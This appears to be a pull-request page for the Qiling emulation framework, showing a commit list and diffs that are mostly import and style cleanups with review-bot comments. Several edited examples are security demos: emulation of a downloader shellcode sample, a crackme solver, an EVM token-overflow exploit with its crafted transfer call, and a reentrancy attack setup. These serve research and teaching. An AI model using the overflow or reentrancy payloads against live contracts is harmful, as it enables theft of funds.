Merged
Commits
117 commits
09562f6
to 1.4.6-dev
xwings Dec 31, 2022
e539e8b
Update ChangeLog
xwings Dec 31, 2022
8240471
Fix ELF argv encoding
elicn Jan 8, 2023
298d7b4
Merge pull request #1303 from elicn/fix-argv
kabeor Jan 15, 2023
fe91fe6
Update CREDITS.md
xwings Jan 18, 2023
3cc980e
added a pipe that can be used when a user wants to run the emulation,…
Jan 23, 2023
da46fbe
clarified documentation
Jan 23, 2023
1602bc0
forgot to type hint the return value
Jan 23, 2023
b4d54fe
partially fixed kernel32.dll$_CreateFile function
Feb 6, 2023
b60eaba
fixed issue with Write only, Truncate + Create new
Feb 6, 2023
f2b3209
fix error if access mask is invalid
Feb 6, 2023
c23abeb
show invalid instruction now
ucgJhe Feb 7, 2023
775bc69
pause at program exit point, now step command accepts argument
ucgJhe Feb 7, 2023
c19fcf1
added a history tracker to get coverage information about the executi…
Feb 16, 2023
ffc3a46
updated some values to be in hex, removed some code that was just use…
Feb 16, 2023
9d2069e
Merge pull request #1313 from anotherdish/feature/improve-coverage-in…
xwings Feb 24, 2023
a08ef1f
remove tab and replace with 4 space
xwings Feb 28, 2023
368cae3
remove orig files
xwings Feb 28, 2023
87c79e6
Merge pull request #1320 from xwings/dev
xwings Feb 28, 2023
2f5ae46
Merge pull request #1309 from kbsec/dev
xwings Feb 28, 2023
87ae716
Merge pull request #1307 from anotherdish/feature/add-interactive-pipe
xwings Feb 28, 2023
82d5c68
Introduce emu_state core property
elicn Mar 3, 2023
bbd8f7e
Remove the PE_RUN property
elicn Mar 3, 2023
5ca0764
Fix #1310
elicn Mar 3, 2023
1a0df1e
Opportunistic PEP8 fixes
elicn Mar 3, 2023
997be39
fix #1325
DiamondHunters Mar 11, 2023
9eaf559
added tests to assert history has length, and to test the case where …
Feb 24, 2023
f2aac3c
fixed issue where the get_ins_exclude_lib wasn't handling filters for …
Feb 24, 2023
3f67544
brought back the list comprehension (thanks @elicn) and reimplemented…
Feb 28, 2023
8fbbfb8
made more changes as per the comments in PR 1317
Mar 6, 2023
de4e38b
added the __future__ annotations so I don't have to use quotes for the…
Mar 6, 2023
2952989
added some more type annotations, added a new callback specifically f…
Mar 6, 2023
2a78192
cleaned up some pylint stuff, consolidated the arm and other arch blo…
Mar 7, 2023
254d982
commenting on why we have this arm handler in the __hook_block
Mar 7, 2023
4c9e6b5
removing "*context" argument from history tracker callback
Mar 7, 2023
489c3b6
Delete plugin object before reloading custom_script
DiamondHunters Mar 17, 2023
b3293e1
Merge pull request #1322 from elicn/fix-gdb-stop
xwings Mar 21, 2023
b667054
Merge pull request #1327 from DiamondHunters/qilingida
xwings Mar 29, 2023
e2b0e4d
Merge pull request #1326 from DiamondHunters/patch-1
xwings Mar 29, 2023
c006864
Remove unnecessary property elf_emu_start
elicn Mar 10, 2023
28e1f33
Fix unsafe ELF interpreter loading
elicn Mar 10, 2023
f6200ac
Fix wrapper decoration
elicn Mar 10, 2023
4b4ed62
Reduce module dependencies
elicn Mar 10, 2023
b9f61a9
Have gdbserver report back Uc errors
elicn Mar 10, 2023
c89b43a
Opportunistic PEP8 fixes
elicn Mar 10, 2023
c67a64e
Properly load QNS profile values
elicn Mar 10, 2023
5e9738c
Minor code rearrangements in gdb
elicn Mar 10, 2023
f58c494
Revamp FS mapper
elicn Mar 27, 2023
263d523
Revamp POSIX fcntl
elicn Mar 27, 2023
5aedbaf
Fix close_on_exec type
elicn Mar 27, 2023
8261039
Avoid overwriting custom procfs mappings
elicn Mar 30, 2023
b8c78c6
Turned close_on_exec into a simple member
elicn Mar 30, 2023
0fd6209
Added closed property to ql_file
elicn Mar 30, 2023
056969f
Patched unistd functions
elicn Mar 30, 2023
0be4620
Patched fcntl functions
elicn Mar 30, 2023
2430578
Patched some stat functions
elicn Mar 30, 2023
63c92f1
Fix a bug in FindFirstFileA
elicn Mar 30, 2023
629454f
Re-implemented POSIX shm syscalls
elicn Apr 2, 2023
e76b8ab
Partially implemented POSIX IPC syscall
elicn Apr 2, 2023
2347a9b
Adjust ELF shellcode tests
elicn Apr 3, 2023
3266680
Allow shellcode execve fail gracefully
elicn Apr 3, 2023
d9ff19d
Patch POSIX execve
elicn Apr 3, 2023
b3de208
Prevent emulation from closing host std streams
elicn Apr 3, 2023
32a8588
Insignificant styling and typo fixes
elicn Apr 3, 2023
48cc58d
Properly set emu_state
elicn Apr 4, 2023
c069a10
Collect new vcruntime140 DLLs
elicn Apr 4, 2023
412bcaf
Use yaml safe loader
elicn Apr 4, 2023
85430f0
Use mmap min address for shm allocations
elicn Apr 7, 2023
06cd3f0
Typo bugfix
elicn Apr 7, 2023
88a76a2
Fix struct packing logic associated with calls to getdents64.
Apr 1, 2023
ba7414a
Improve afl_fuzz wrapper
kiddo-pwn Mar 29, 2023
bb0c5f3
Update fuzzing sample due to changes in fuzz wrapper
kiddo-pwn Mar 30, 2023
0dd8545
Re-implement POSIX shm
elicn Apr 13, 2023
817bdb7
Add POSIX shmdt syscall
elicn Apr 13, 2023
a95b22b
Make argv and code mutually exclusive
elicn Apr 14, 2023
609ea31
Opportunistic PEP8 fixes
elicn Apr 14, 2023
717899b
Decouple runtime dependencies
elicn Apr 14, 2023
ace56d8
Rearrange and fix ELF MT test suite
elicn Apr 16, 2023
073950a
Fix bugs in IPv6 socket impl
elicn Apr 23, 2023
062bb57
Remove unused log colors
elicn Apr 28, 2023
26e4786
Switch back to default color instead of resetting entirely
elicn Apr 28, 2023
45056c9
Adhere to the NO_COLOR convention
elicn Apr 28, 2023
8a364a5
Slightly optimize logging for speed
elicn Apr 28, 2023
4c53a43
Handle fds that lack the close_on_exec property
elicn Apr 28, 2023
97002fe
Merge pull request #1336 from elicn/dev-improv
xwings May 10, 2023
5db7c5c
Make sure dllscollector script is run with admin privs
elicn May 24, 2023
1947e1c
Patch string utils to allow specifying maxlength
elicn May 24, 2023
26c2aa4
Fix PANSI_STRING and PUNICODE_STRING handling
elicn May 24, 2023
734e230
Properly report unsupported arch_prctl code values
elicn May 24, 2023
cf61fe6
Correct x86 segment selector and descriptor bits
elicn May 24, 2023
3bd774e
Support the case of a zero size ELF region
elicn May 28, 2023
2ce9ff5
Fix Windows SetInformationProcess
elicn May 28, 2023
0617213
Add qltui.py
river-li May 29, 2023
df329e8
Fix typo
elicn May 29, 2023
86b8b6f
Add tracing example
elicn May 29, 2023
1706049
Merge pull request #1354 from river-li/dev
kabeor May 29, 2023
9a64573
fixed bugs in export table and GetProcAddress
clairelevin Jun 1, 2023
41b3b83
added comment for export table fix
clairelevin Jun 5, 2023
38a8622
archtype and ostype no longer support string values
elicn Jun 16, 2023
4860f95
Opportunistic PEP8 fixes
elicn Jun 17, 2023
a9233b5
Speed up ARM assembler and disassembler access
elicn Jun 19, 2023
7ef734d
feat(os): add posix message queue syscalls
chinggg Jun 21, 2023
526a1b0
Rename and revamp netgear 6220 example
elicn Jun 28, 2023
d1accb9
Revamp IDA custom script
elicn Jun 28, 2023
c85f592
Revamp Tenda AC15 example
elicn Jun 28, 2023
88c69eb
Make progress animation more robust
elicn Jul 3, 2023
260aad7
Some more opportunistic PEP8 fixes
elicn Jul 3, 2023
28ae2c8
Update msg.py
elicn Jul 3, 2023
29f9326
Update syscall.py
elicn Jul 3, 2023
6011be1
Update msg.py
elicn Jul 3, 2023
83bcbbf
Merge pull request #1363 from chinggg/ipc-msg
xwings Jul 4, 2023
7d28532
Merge pull request #1358 from clairelevin/bugfix
kabeor Jul 4, 2023
930da79
Fix bug: qdb executes from the entry point of the binary when using…
ltlly Jul 6, 2023
f456d07
Merge pull request #1355 from elicn/periodic
xwings Jul 13, 2023
ca62670
update return register accordingly
ucgJhe Jul 28, 2023
729360e
prepare for 1.4.6
xwings Aug 4, 2023
1a92844
Merge pull request #1367 from ucgJhe/dev
xwings Aug 4, 2023
1 change: 1 addition & 0 deletions CREDITS.md
@@ -18,6 +18,7 @@
- KONG ziqiao (lazymio) <mio_at_lazym_io>
- YU zheng (dataisland) <dataisland_at_outlook_com>
- Eli Cohen Nehemia (elicn) <elichn_at_gmail_com>
- Li Hong Jhe (ucgJhe) <ucg.jhe_at_gamil_com>


#### CI, Website,Documentations, Logo & Swags
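Review bot: the e-mail in the new entry `- Li Hong Jhe (ucgJhe) <ucg.jhe_at_gamil_com>` has its domain spelled `gamil_com`, while the neighbouring entries in this block (for example `<elichn_at_gmail_com>`) use `gmail_com`; confirm with the contributor whether `gamil` is a typo before the address is recorded in CREDITS.md.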
3 changes: 1 addition & 2 deletions ChangeLog
@@ -1,7 +1,7 @@
This file details the changelog of Qiling Framework.

------------------------------------
[Version 1.4.5]: December 29th, 2022
[Version 1.4.5]: December 31st, 2022

New features:
- Qdb with PE (#1295)
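Review bot: this hunk rewrites the release date of an already-published version (`[Version 1.4.5]: December 29th, 2022` becomes `December 31st, 2022`) with no other change in the section; that is fine if the tag was actually cut on the 31st, but please check the date against the 1.4.5 release tag so the changelog and the release stay consistent. The commit list also carries `to 1.4.6-dev` and `prepare for 1.4.6`, yet no 1.4.6 section appears in the visible hunks; confirm it is added elsewhere in the file.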
@@ -41,7 +41,6 @@ Contributors:
- ucgJhe
- aquynh
- owl129
-

------------------------------------
[Version 1.4.4]: September 24th, 2022
7 changes: 4 additions & 3 deletions examples/adcache_x86_windows_debug.py
@@ -3,17 +3,18 @@
# Cross Platform and Multi Architecture Advanced Binary Emulation Framework
#

from zipfile import ZipFile

import sys
sys.path.append("..")

from zipfile import ZipFile
from qiling import Qiling
from qiling.const import QL_VERBOSE
from qiling.const import QL_ARCH, QL_OS, QL_VERBOSE

if __name__ == "__main__":
with ZipFile("shellcodes/win32_https_download.zip") as zip_reader:
with zip_reader.open('win32_https_download.bin', 'r', b'infected') as f:
sc = f.read()

ql = Qiling(code=sc, archtype="x86", ostype="windows", rootfs="rootfs/x86_windows", verbose=QL_VERBOSE.DEBUG)
ql = Qiling(code=sc, archtype=QL_ARCH.X86, ostype=QL_OS.WINDOWS, rootfs="rootfs/x86_windows", verbose=QL_VERBOSE.DEBUG)
ql.run()
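Review bot: moving `from zipfile import ZipFile` below `sys.path.append("..")` is unnecessary and breaks the usual stdlib-first import grouping; the standard-library import does not depend on the path tweak, so keep it above the `sys.path` manipulation and place only the `qiling` imports after it. The switch from `archtype="x86", ostype="windows"` to `QL_ARCH.X86` / `QL_OS.WINDOWS` is correct and matches the `archtype and ostype no longer support string values` commit in this PR.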
28 changes: 17 additions & 11 deletions examples/doogie_8086_crack.py
@@ -1,15 +1,22 @@
#!/usr/bin/env python3
#
#
# Cross Platform and Multi Architecture Advanced Binary Emulation Framework
#

import sys, curses, math, struct, string, time
import curses
import math
import string
import time

from struct import pack

import sys
sys.path.append("..")
from qiling import *

from qiling import Qiling
from qiling.const import *
from qiling.os.disk import QlDisk
from qiling.os.dos.utils import BIN2BCD
from struct import pack


# https://stackoverflow.com/questions/9829578/fast-way-of-counting-non-zero-bits-in-positive-integer
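Review bot: `from qiling import *` is replaced with an explicit `from qiling import Qiling`, but `from qiling.const import *` is kept as a wildcard; the only name the visible code needs from that module is `QL_INTERCEPT` (see `ql.os.set_api((0x1a, 4), set_required_datetime, QL_INTERCEPT.EXIT)` further down this diff), so `from qiling.const import QL_INTERCEPT` would make the dependency explicit and consistent with the rest of this import cleanup.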
@@ -129,9 +136,7 @@ def show_once(ql: Qiling, key):
# In this stage, we show every key.
def third_stage(keys):
# To setup terminal again, we have to restart the whole program.
ql = Qiling(["rootfs/8086/doogie/doogie.DOS_MBR"],
"rootfs/8086",
console=False)
ql = Qiling(["rootfs/8086/doogie/doogie.DOS_MBR"], "rootfs/8086", console=False)
ql.add_fs_mapper(0x80, QlDisk("rootfs/8086/doogie/doogie.DOS_MBR", 0x80))
ql.os.set_api((0x1a, 4), set_required_datetime, QL_INTERCEPT.EXIT)
hk = ql.hook_code(stop, begin=0x8018, end=0x8018)
@@ -170,21 +175,22 @@ def read_until_zero(ql: Qiling, addr):
addr += 1
return buf


def set_required_datetime(ql: Qiling):
ql.log.info("Setting Feburary 06, 1990")
ql.arch.regs.ch = BIN2BCD(19)
ql.arch.regs.cl = BIN2BCD(1990%100)
ql.arch.regs.cl = BIN2BCD(1990 % 100)
ql.arch.regs.dh = BIN2BCD(2)
ql.arch.regs.dl = BIN2BCD(6)


def stop(ql, addr, data):
ql.emu_stop()


# In this stage, we get the encrypted data which xored with the specific date.
def first_stage():
ql = Qiling(["rootfs/8086/doogie/doogie.DOS_MBR"],
"rootfs/8086",
console=False)
ql = Qiling(["rootfs/8086/doogie/doogie.DOS_MBR"], "rootfs/8086", console=False)
ql.add_fs_mapper(0x80, QlDisk("rootfs/8086/doogie/doogie.DOS_MBR", 0x80))
# Doogie suggests that the datetime should be 1990-02-06.
ql.os.set_api((0x1a, 4), set_required_datetime, QL_INTERCEPT.EXIT)
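Review bot: while this whitespace pass touches `set_required_datetime`, the unchanged context line `ql.log.info("Setting Feburary 06, 1990")` still misspells February; fixing the spelling in the same hunk would be cheap. Minor: `def stop(ql, addr, data):` is the only callback in the visible region without type hints, unlike `read_until_zero(ql: Qiling, addr)` and `set_required_datetime(ql: Qiling)`.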
17 changes: 10 additions & 7 deletions examples/evm/evm_Hexagon_overflow.py
@@ -1,20 +1,21 @@
#!/usr/bin/env python3
#
#
# Cross Platform and Multi Architecture Advanced Binary Emulation Framework
#

# https://etherscan.io/tx/0x9243d45ca81db4f16a0ded3e57982b4bc95ec32ce69d541bf6e019d949cbc6c8
# https://www.anquanke.com/post/id/145520

import sys

sys.path.append("../..")
from qiling import *

from qiling import Qiling
from qiling.const import QL_ARCH


def example_run_evm():
contract = '0x606060405266017dfcdece4000600055341561001a57600080fd5b600160a060020a033316600090815260016020526040902066017dfcdece400090556106eb8061004b6000396000f3006060604052600436106100c45763ffffffff7c010000000000000000000000000000000000000000000000000000000060003504166306fdde0381146100c9578063095ea7b31461015357806318160ddd1461018957806323b872dd146101ae57806327edf097146101d6578063313ce567146101ff578063378dc3dc1461021257806342966c681461022557806370a082311461023b578063771282f61461025a57806395d89b411461026d578063a9059cbb14610280578063dd62ed3e146102a2575b600080fd5b34156100d457600080fd5b6100dc6102c7565b60405160208082528190810183818151815260200191508051906020019080838360005b83811015610118578082015183820152602001610100565b50505050905090810190601f1680156101455780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b341561015e57600080fd5b610175600160a060020a03600435166024356102fe565b604051901515815260200160405180910390f35b341561019457600080fd5b61019c6103a4565b60405190815260200160405180910390f35b34156101b957600080fd5b610175600160a060020a03600435811690602435166044356103aa565b34156101e157600080fd5b6101e9610422565b60405160ff909116815260200160405180910390f35b341561020a57600080fd5b6101e9610427565b341561021d57600080fd5b61019c61042c565b341561023057600080fd5b610175600435610437565b341561024657600080fd5b61019c600160a060020a03600435166104ea565b341561026557600080fd5b61019c6104fc565b341561027857600080fd5b6100dc610502565b341561028b57600080fd5b610175600160a060020a0360043516602435610539565b34156102ad57600080fd5b61019c600160a060020a036004358116906024351661054f565b60408051908101604052600781527f48657861676f6e00000000000000000000000000000000000000000000000000602082015281565b60008115806103305750600160a060020a03338116600090815260026020908152604080832093871683529290522054155b151561033b57600080fd5b600160a060020a03338116600081815260026020908152604080832094881680845294909152908190208590557f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925908590519081526020016040
5180910390a350600192915050565b60005490565b600160a060020a03808416600090815260026020908152604080832033909416835292905290812054829010156103e057600080fd5b600160a060020a038085166000908152600260209081526040808320339094168352929052208054839003905561041884848461056c565b5060019392505050565b600281565b600481565b66017dfcdece400081565b600160a060020a0333166000908152600160205260408120548290101561045d57600080fd5b600160a060020a033316600081815260016020526040808220805486900390558180527fa6eef7e35abe7026729641147f7915573c7e97b47efa546f5f6e3230263bcb4980548601905581548590039091557fcc16f5dbb4873280815c1ee09dbd06736cffcc184412cf7a71a0fdb75d397ca59084905190815260200160405180910390a2506001919050565b60016020526000908152604090205481565b60005481565b60408051908101604052600381527f4858470000000000000000000000000000000000000000000000000000000000602082015281565b600061054633848461056c565b50600192915050565b600260209081526000928352604080842090915290825290205481565b600160a060020a038216151561058157600080fd5b600160a060020a038316600090815260016020526040902054600282019010156105aa57600080fd5b600160a060020a038216600090815260016020526040902054818101116105d057600080fd5b600160a060020a03808416600081815260016020526040808220805460011990879003810190915593861682528082208054860190558180527fa6eef7e35abe7026729641147f7915573c7e97b47efa546f5f6e3230263bcb4980546002908101909155825490940190915590917fcc16f5dbb4873280815c1ee09dbd06736cffcc184412cf7a71a0fdb75d397ca5915160ff909116815260200160405180910390a281600160a060020a031683600160a060020a03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405190815260200160405180910390a35050505600a165627a7a72305820fbef5b10322242b8659b5de8e24ec1cf5e809831f6f7c08e52112f76daa31aef0029'
ql = Qiling(code=contract, archtype="evm")
ql = Qiling(code=contract, archtype=QL_ARCH.EVM)

user1 = ql.arch.evm.create_account(balance=100*10**18)
user2 = ql.arch.evm.create_account(balance=100*10**18)
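Review bot: replacing `from qiling import *` with `from qiling import Qiling` plus `from qiling.const import QL_ARCH` drops every other name the wildcard used to provide; the visible lines only use `Qiling` and `QL_ARCH.EVM`, but the rest of the file is collapsed, so check that nothing else in `example_run_evm` or `check_balance` relied on names that previously arrived through the wildcard import.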
@@ -36,9 +37,10 @@ def check_balance(sender, destination):
# # SMART CONTRACT DEPENDENT: transform from user1 to user2
call_data = '0xa9059cbb'+ ql.arch.evm.abi.convert(['address'], [user2]) + \
ql.arch.evm.abi.convert(['uint256'], [0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe])
msg1 = ql.arch.evm.create_message(user1, c1, data=call_data)
msg1 = ql.arch.evm.create_message(user1, c1, data=call_data)
result = ql.run(code=msg1)
if int(result.output.hex()[2:], 16) == 1:

if int(result.output.hex()[2:], 16) == 1:
print('User1 transfered Token to User1')

# # SMART CONTRACT DEPENDENT: User1 balance underflow, MAX - 1
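Review bot: the unchanged context line `print('User1 transfered Token to User1')` has both a spelling error (`transfered`) and a misleading recipient: the `call_data` built two lines above encodes `user2` as the `address` argument of the transfer, so the message should name User2. Since this hunk already re-indents `msg1 = ...` and adds a blank line, correcting the string here would be appropriate.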
@@ -48,5 +50,6 @@ def check_balance(sender, destination):
result = check_balance(user2, c1)
print('User2 final balance =', int(result.output.hex()[2:], 16))


if __name__ == "__main__":
example_run_evm()
example_run_evm()
10 changes: 6 additions & 4 deletions examples/evm/evm_debugger.py
@@ -1,16 +1,18 @@
#!/usr/bin/env python3
#
#
# Cross Platform and Multi Architecture Advanced Binary Emulation Framework
#

import sys

sys.path.append("../..")
from qiling import *

from qiling import Qiling
from qiling.const import QL_ARCH


if __name__ == '__main__':
contract = '0x6060604052341561000f57600080fd5b60405160208061031c833981016040528080519060200190919050508060018190556000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555050610299806100836000396000f300606060405260043610610057576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff16806318160ddd1461005c57806370a0823114610085578063a9059cbb146100d2575b600080fd5b341561006757600080fd5b61006f61012c565b6040518082815260200191505060405180910390f35b341561009057600080fd5b6100bc600480803573ffffffffffffffffffffffffffffffffffffffff16906020019091905050610132565b6040518082815260200191505060405180910390f35b34156100dd57600080fd5b610112600480803573ffffffffffffffffffffffffffffffffffffffff1690602001909190803590602001909190505061017a565b604051808215151515815260200191505060405180910390f35b60015481565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b600080826000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205403101515156101cb57600080fd5b816000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540392505081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254019250508190555060019050929150505600a165627a7a7230582098f1551a391a3e65b3ce45cfa2b3fa5f91eea9a3e7181a81454e025ea0d7151c0029'
ql = Qiling(code=contract, archtype="evm")
ql = Qiling(code=contract, archtype=QL_ARCH.EVM)
ql.debugger = True

# Add Balance Var to the contract
15 changes: 8 additions & 7 deletions examples/evm/evm_reentrancy.py
@@ -1,22 +1,23 @@
#!/usr/bin/env python3
#
#
# Cross Platform and Multi Architecture Advanced Binary Emulation Framework
#

import sys

sys.path.append("../..")
from qiling import *

from qiling import Qiling
from qiling.arch.evm.vm.utils import bytecode_to_bytes, runtime_code_detector
from qiling.arch.evm.vm.vm import BaseVM
from qiling.arch.evm.constants import CREATE_CONTRACT_ADDRESS
from qiling.const import QL_ARCH


if __name__ == '__main__':
# Attack_contract = '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'
Attack_contract = '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'

ql = Qiling(code=Attack_contract, archtype="evm")
ql = Qiling(code=Attack_contract, archtype=QL_ARCH.EVM)
vm:BaseVM = ql.arch.evm.vm

C1 = b'\xaa' * 20
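Review bot: `vm:BaseVM = ql.arch.evm.vm` should be written `vm: BaseVM = ql.arch.evm.vm` (PEP 8 wants a space after the colon in a variable annotation), which is worth fixing here since this PR otherwise applies PEP 8 cleanups. Also, the commented-out `# Attack_contract = ...` line directly above the live `Attack_contract = ...` assignment is dead code and can be dropped.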
@@ -28,9 +29,9 @@
ql.arch.evm.create_account(C2)
ql.arch.evm.create_account(User1, 100*10**18)
ql.arch.evm.create_account(User2, 100*10**18)

EtherStore_contract = '0x6080604052670de0b6b3a764000060005534801561001c57600080fd5b506103b08061002c6000396000f30060806040526004361061006d576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680631031ec3114610072578063155dd5ee146100c957806327e235e3146100f65780637ddfe78d1461014d578063e2c41dbc14610178575b600080fd5b34801561007e57600080fd5b506100b3600480360381019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610182565b6040518082815260200191505060405180910390f35b3480156100d557600080fd5b506100f46004803603810190808035906020019092919050505061019a565b005b34801561010257600080fd5b50610137600480360381019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610317565b6040518082815260200191505060405180910390f35b34801561015957600080fd5b5061016261032f565b6040518082815260200191505060405180910390f35b610180610335565b005b60016020528060005260406000206000915090505481565b80600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054101515156101e857600080fd5b60005481111515156101f957600080fd5b62093a80600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205401421015151561024c57600080fd5b3373ffffffffffffffffffffffffffffffffffffffff168160405160006040518083038185875af192505050151561028357600080fd5b80600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254039250508190555042600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555050565b60026020528060005260406000206000915090505481565b60005481565b34600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505600a165627a7a72305820707bf0ae11ce52ff7b7846ede3497d41b6fadea29579773fc70e8e61c0f549f1002
9'

print('Init Victim balance is', vm.state.get_balance(User1)/10**18)
print('Init Attacker balance is', vm.state.get_balance(User2)/10**18)

@@ -66,7 +67,7 @@
res_code = bytecode_to_bytes(res.output)
runtime_code, aux_data, constructor_args = runtime_code_detector(res_code)
rt_code1 = bytecode_to_bytes(runtime_code)

print('\n------ Attacker deposit 1 ETH to DeFi contract, Start Reentrancy Attack')
# 4. User2 pwnEtherStore with 1ETH
call_data = '0xa75e4625' + ql.arch.evm.abi.convert(['bytes4'], [bytecode_to_bytes('0xe2c41dbc')]) + ql.arch.evm.abi.convert(['bytes4'], [bytecode_to_bytes('0x155dd5ee')])